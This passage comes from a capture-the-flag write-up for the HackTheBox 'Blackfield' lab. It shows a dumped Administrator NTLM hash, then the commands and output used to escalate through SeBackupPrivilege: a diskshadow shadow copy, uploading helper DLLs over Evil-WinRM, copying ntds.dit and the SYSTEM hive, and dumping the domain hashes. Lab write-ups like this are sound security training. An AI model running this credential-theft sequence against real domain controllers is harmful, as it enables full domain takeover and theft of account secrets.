Authentication Id : 0 ; 153705 (00000000:00025869)
Session : Interactive from 1
User Name : Administrator
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23-02-2020 23:29:04
SID : S-1-5-21-4194615774-2175524697-3563712290-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : BLACKFIELD
* NTLM : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
* SHA1 : db5c89a961644f0978b4b69a4d2a2239d7886368
* DPAPI : 240339f898b6ac4ce3f34702e4a89550
tspkg :
wdigest :
* Username : Administrator
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : Administrator
* Domain : BLACKFIELD.LOCAL
* Password : (null)

Now we have svc_backup hash, Let’s login

Gain user flag!

Privilege Escalation

I tried to see what is the privilege that user has

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all

USER INFORMATION
----------------

User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>
  • So the user can backup the data, So i can backup the NTDS.dit file that stores AD data, including information about user objects, groups, and group membership
  • After searching i found that i need to use diskshadow, I found simple script that will execute commands on the Diskshadow and upload it
*Evil-WinRM* PS C:\temp> diskshadow /s text.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 6/12/2020 4:21:22 PM

-> SET CONTEXT PERSISTENT NOWRITERS
-> add volume c: alias text
-> create
Alias 0xprashant for shadow ID {84b7f11c-93da-4701-9af4-2c0adfc7cb2e} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9} set as environment variable.

Querying all shadow copies with the shadow copy set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9}

* Shadow copy ID = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e} %0xprashant%
- Shadow copy set: {c38f96e5-6d7e-49f8-b605-25b0b25934e9} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 6/10/2020 3:41:17 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %text% z:
-> %0xprashant% = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e}
The shadow copy was successfully exposed as z:\.

Now we will try to copy NTDS.dit
Upload this tool: https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

*Evil-WinRM* PS C:\temp> upload /root/Desktop/SeBackupPrivilegeCmdLets.dll
Info: Uploading /root/Desktop/SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll


Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\temp> upload /root/Desktop/SeBackupPrivilegeUtils.dll
Info: Uploading /root/Desktop/SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll


Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

Import

*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeCmdLets.dll

Copy NTDS.dit

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit

Got system file and download it

*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system*Evil-WinRM* PS C:\temp> download system
*Evil-WinRM* PS C:\temp> download

After download, I tried to dump NTLM hash from system and NTDS.dit using secretdump.py script
Now we gain NTLM hash from administrator, Let’s login

Ref:
Reset password in rpcclient : https://malicious.link/post/2017/reset-ad-user-password-with-linux/
Dump lsass.dmp : https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf
Mimikatz : https://github.com/gentilkiwi/mimikatz/releases
BackupPrivilege : https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf

If u learn any thing useful from write up, Respect me on HackTheBox

CTFer | Computer Science Student

CTFer | Computer Science Student